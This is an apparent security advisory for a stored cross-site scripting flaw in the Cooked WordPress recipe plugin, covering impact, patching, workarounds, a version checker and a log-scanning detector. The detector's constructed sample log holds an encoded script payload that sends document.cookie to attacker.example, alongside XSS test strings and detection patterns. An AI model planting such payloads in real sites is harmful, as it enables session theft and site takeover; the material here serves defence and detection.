CVE-2024-37308
📋 TL;DR
The Cooked Pro WordPress recipe plugin (Cooked by Boxystudio) contains a stored cross-site scripting (XSS) flaw: the `_recipe_settings[post_title]` value submitted when a recipe is saved is neither sufficiently sanitized on input nor escaped on output. An authenticated attacker with Contributor-level access or higher can store a script in a recipe title that runs in the browser of anyone who views or previews the recipe, including the editors and administrators who review a contributor's draft, and from there act with that user's privileges. Versions up to and including 1.7.15.4 are affected; version 1.8.0 fixes it.
💻 Affected Systems
- Cooked Pro WordPress plugin (plugin slug `cooked`), versions 1.7.15.4 and earlier; fixed in 1.8.0
📦 What is this software?
Cooked is a recipe plugin for WordPress by Boxystudio (source: https://github.com/XjSv/Cooked). It adds a recipe post type whose per-recipe settings, the title among them, are submitted through the WordPress editor as `_recipe_settings[...]` form fields.
⚠️ Risk & Real-World Impact
Worst Case
A payload stored in a recipe title runs in the browser of any administrator or editor who opens, previews or reviews that recipe. WordPress sets its authentication cookies HttpOnly, so the script normally cannot read them directly, but it does not need to: it can issue requests to wp-admin or the REST API inside the victim's session, using the nonces present in the page, to create a new administrator account, install a plugin or edit theme files. Visitors to the published recipe can be redirected to attacker-controlled sites or shown defaced content. Either path ends in full site compromise.
Likely Case
A contributor, a role that can draft recipes but not publish them, saves a recipe whose title carries a script and waits for an editor or administrator to review it. When the reviewer opens the recipe, the script runs with the reviewer's privileges and performs an action the contributor could not, typically creating an additional administrator account, which escalates the attacker to full control of the site.
If Mitigated
With the patched version, the title is sanitized when the recipe is saved and escaped when it is rendered, so markup submitted by a contributor appears as literal text instead of executing. Contributors can still create and edit recipes within the limits of their role, which is the intended behavior; only the ability to smuggle active content into a title is removed.
🎯 Exploit Status
Exploitation requires an authenticated account with the Contributor role or higher; the vulnerable code path is not reachable by unauthenticated visitors. The flaw is in the `_recipe_settings[post_title]` parameter submitted when a recipe is saved: the value is stored with insufficient sanitization and rendered without escaping, so a crafted title entered through the normal recipe editor is enough to trigger it. The payload persists until the recipe is edited or deleted, and it fires for every user who views the recipe, not only for the attacker.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.8.0
Vendor Advisory: https://github.com/XjSv/Cooked/security/advisories/GHSA-9vfv-c966-jwrv
Restart Required: No
Instructions:
1. Update the Cooked Pro plugin to version 1.8.0 or later from the WordPress admin dashboard (Plugins > Update) or with `wp plugin update cooked`.
2. If you run the plugin from the XjSv/Cooked source tree rather than a release, apply commit 8cf88f334ccbf11134080bbb655c66f1cfe77026 manually.
🔧 Temporary Workarounds
Restrict User Roles
Until the update is applied, restrict who can create or edit recipes: review every account holding the Contributor role or higher, remove or downgrade any that do not need it, and confirm that the default role for new registrations (Settings > General) is not Contributor or higher. This limits who can plant a payload; it does not neutralize payloads already stored in existing recipes.
Input Validation Filter
Add a custom WordPress filter that sanitizes the `_recipe_settings[post_title]` value before the plugin stores it, for example as a must-use plugin in wp-content/mu-plugins/. The `cooked_recipe_settings` hook name is as given on this page; confirm the hook is actually applied in your plugin version (grep the plugin source for `apply_filters`) before relying on it. Note that `sanitize_text_field()` strips tags and encoded octets on input but is not a substitute for escaping the value on output (`esc_html()`/`esc_attr()`), which is the durable fix.

```php
<?php
// Temporary hardening for CVE-2024-37308: strip tags from the recipe title
// before the plugin stores it. Relies on the 'cooked_recipe_settings' hook
// being applied by the plugin; verify that for your installed version.
add_filter('cooked_recipe_settings', 'sanitize_recipe_title');

function sanitize_recipe_title($settings) {
    if (isset($settings['post_title'])) {
        // sanitize_text_field() removes tags, invalid UTF-8, line breaks and
        // percent-encoded octets; it does not escape for HTML output.
        $settings['post_title'] = sanitize_text_field($settings['post_title']);
    }
    return $settings;
}
```
🧯 If You Can't Patch
- Deactivate the Cooked Pro plugin until it can be updated. Recipe posts stay in the database and are available again once the patched version is activated.
- Add WAF rules that inspect POST bodies to WordPress admin endpoints and block `_recipe_settings[post_title]` values containing script tags, `javascript:` URIs or inline event handlers (`onerror=`, `onload=`). Match on the URL-decoded value, since browsers submit the field as `_recipe_settings%5Bpost_title%5D=%3Cscript...`. Treat this as a stopgap: signature rules are easy to bypass, and they do nothing for payloads that are already stored.
🔍 How to Verify
Check if Vulnerable:
Open Plugins in the WordPress admin dashboard and read the version shown for Cooked Pro. Version 1.7.15.4 or earlier is vulnerable.
Check Version:
wp plugin list --name=cooked --field=version
Verify Fix Applied:
After updating, confirm that the Plugins page (or the wp-cli command above) reports 1.8.0 or later. To test behavior rather than the version number, do it on a staging copy: log in as a Contributor, save a recipe whose title contains a harmless marker such as `<b>test</b>` or `<script>alert(1)</script>`, then preview and view the recipe as an administrator and check that the markup is shown as literal text or stripped, not rendered or executed.
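The version check above, automated so it can be run across several WordPress roots. This is an added example, not code from this page or from Boxystudio; it assumes wp-cli is on PATH and is run from the WordPress root (or pointed at one with `--path`), and that the plugin slug is `cooked`, as in the wp-cli command on this page. It compares versions component by component, because a plain string comparison would rank a hypothetical 1.10.0 below 1.8.0.

```python
import shutil
import subprocess
from typing import Optional, Tuple

FIXED_VERSION = "1.8.0"   # first release containing the fix, per the advisory
PLUGIN_SLUG = "cooked"    # slug from this page's wp-cli command (assumption: unchanged on your site)


def parse_version(version: str) -> Tuple[int, ...]:
    """'1.7.15.4' -> (1, 7, 15, 4). Each dotted component keeps only its leading
    digits, so a tag like '1.8.0-beta1' compares as (1, 8, 0)."""
    parts = []
    for component in version.strip().split("."):
        digits = ""
        for ch in component:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


def is_vulnerable(installed: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the installed version predates the patched release.
    Tuples are zero-padded so '1.8' and '1.8.0' compare equal."""
    a, b = parse_version(installed), parse_version(fixed)
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))
    b += (0,) * (width - len(b))
    return a < b


def installed_version(path: Optional[str] = None, slug: str = PLUGIN_SLUG) -> Optional[str]:
    """Ask wp-cli for the plugin's version. Returns None when the `wp` binary is
    not on PATH, the plugin is absent, or the command fails."""
    if shutil.which("wp") is None:
        return None
    cmd = ["wp", "plugin", "get", slug, "--field=version"]
    if path:
        cmd.append(f"--path={path}")
    proc = subprocess.run(cmd, capture_output=True, text=True)
    if proc.returncode != 0:
        return None
    return proc.stdout.strip() or None


if __name__ == "__main__":
    import sys
    # Usage: python check_cooked.py [/var/www/site1 /var/www/site2 ...]
    sites = sys.argv[1:] or [None]
    for site in sites:
        label = site or "."
        version = installed_version(site)
        if version is None:
            print(f"{label}: plugin '{PLUGIN_SLUG}' not found or wp-cli unavailable")
        else:
            status = "VULNERABLE" if is_vulnerable(version) else "patched"
            print(f"{label}: {PLUGIN_SLUG} {version} -> {status} (fixed in {FIXED_VERSION})")
```

`wp plugin get cooked --field=version` returns the same value as the `wp plugin list` form above; the script only wraps it so the comparison is not done by eye.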
📡 Detection & Monitoring
Log Indicators:
- POST requests to wp-admin/post.php or wp-admin/admin-ajax.php whose body carries a `_recipe_settings[post_title]` value containing `<script`, `javascript:` or an inline event handler (`onerror=`, `onload=`), in raw or URL-encoded form (`%3Cscript`). Plain web-server access logs do not record POST bodies, so this indicator needs a WAF, reverse-proxy or application-level log that captures them.
- Bursts of recipe creations or edits from Contributor-level accounts in a short time frame, especially from accounts registered recently.
Network Indicators:
- Requests to WordPress admin endpoints carrying script payloads in the recipe title parameter; on the response side, recipe pages whose HTML contains unexpected external script sources or fetch destinations.
SIEM Query:
source="wordpress.log" AND ("_recipe_settings[post_title]" OR "_recipe_settings%5Bpost_title%5D") AND ("<script" OR "%3Cscript" OR "javascript:" OR "onerror=" OR "onload=")
The parameter travels in the POST body, so this query only matches if the log source captures request bodies (WAF, reverse-proxy or application log); a URL-only access log will never match it.
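The log indicators above, turned into a check that runs over captured request bodies. This is an added example, not code from this page or from the plugin. It assumes a JSON-lines log from a WAF or reverse proxy that records raw POST bodies; the field names (ts, user, method, uri, body) are an assumption, and the sample lines are constructed for the example. It goes a step beyond the SIEM query above: it matches after URL-decoding and flags inline event handlers and other tag-based vectors, not only `<script`.

```python
import json
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs

# Parameter abused in CVE-2024-37308 (from the advisory).
TARGET_PARAM = "_recipe_settings[post_title]"

# Admin endpoints that can carry the recipe form. Which one your installation
# uses is an assumption; widen the tuple if your WAF shows another path.
ADMIN_ENDPOINTS = ("/wp-admin/post.php", "/wp-admin/admin-ajax.php")

# Indicators of active content in a "title". Applied to the URL-decoded value,
# case-insensitively, so %3Cscript, <script and <SCRIPT are all caught.
XSS_PATTERNS = {
    "tag": re.compile(r"<\s*(script|img|svg|iframe|object|embed|body|math|details|style)\b", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),  # onerror=, onload=, onmouseover=
    "srcdoc": re.compile(r"\bsrcdoc\s*=", re.I),
}

# Constructed sample log (not real traffic): one benign save, two malicious
# saves by the same contributor, and one request that touches a different
# parameter and is therefore outside this CVE's scope.
SAMPLE_LOG = """
{"ts":"2024-06-10T12:00:01Z","user":"carol","method":"POST","uri":"/wp-admin/post.php","body":"post_ID=77&_recipe_settings%5Bpost_title%5D=Grandma%27s+%3C3+Apple+Pie&_recipe_settings%5Bprep_time%5D=30"}
{"ts":"2024-06-10T12:03:19Z","user":"mallory","method":"POST","uri":"/wp-admin/post.php","body":"post_ID=78&_recipe_settings%5Bpost_title%5D=Pie%3Cscript%3Efetch%28%27%2F%2Fattacker.example%2F%3F%27%2Bdocument.cookie%29%3C%2Fscript%3E"}
{"ts":"2024-06-10T12:05:44Z","user":"mallory","method":"POST","uri":"/wp-admin/admin-ajax.php","body":"post_ID=78&_recipe_settings%5Bpost_title%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E"}
{"ts":"2024-06-10T12:07:02Z","user":"dave","method":"POST","uri":"/wp-admin/post.php","body":"post_ID=79&post_title=%3Cscript%3Ealert%281%29%3C%2Fscript%3E"}
""".strip()


def extract_title(body: str) -> Optional[str]:
    """Return the URL-decoded _recipe_settings[post_title] value, or None if absent.
    parse_qs decodes keys as well as values, so the bracketed name arrives intact."""
    values = parse_qs(body, keep_blank_values=True).get(TARGET_PARAM)
    return values[0] if values else None


def classify_title(title: str) -> List[str]:
    """Names of every indicator that matches the decoded title ([] for benign text)."""
    return [name for name, pattern in XSS_PATTERNS.items() if pattern.search(title)]


def scan_log(lines) -> List[Dict]:
    """Flag POSTs to admin endpoints whose recipe title looks like an XSS payload."""
    alerts = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        rec = json.loads(raw)
        if rec.get("method") != "POST" or not rec.get("uri", "").startswith(ADMIN_ENDPOINTS):
            continue
        title = extract_title(rec.get("body", ""))
        if title is None:
            continue  # request did not carry the vulnerable parameter
        hits = classify_title(title)
        if hits:
            alerts.append({"ts": rec.get("ts"), "user": rec.get("user"), "uri": rec["uri"],
                           "title": title, "indicators": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{alert['ts']} {alert['user']} {alert['uri']} {alert['indicators']}: {alert['title']!r}")
```

Run against the sample, the benign title `Grandma's <3 Apple Pie` produces no alert, the two saves by `mallory` are flagged (the second with both a tag and an event-handler indicator), and the request that only sets core `post_title` is ignored because it does not involve this CVE's parameter. To use it on real data, replace `SAMPLE_LOG` with the lines from your body-logging source and feed them to `scan_log()`.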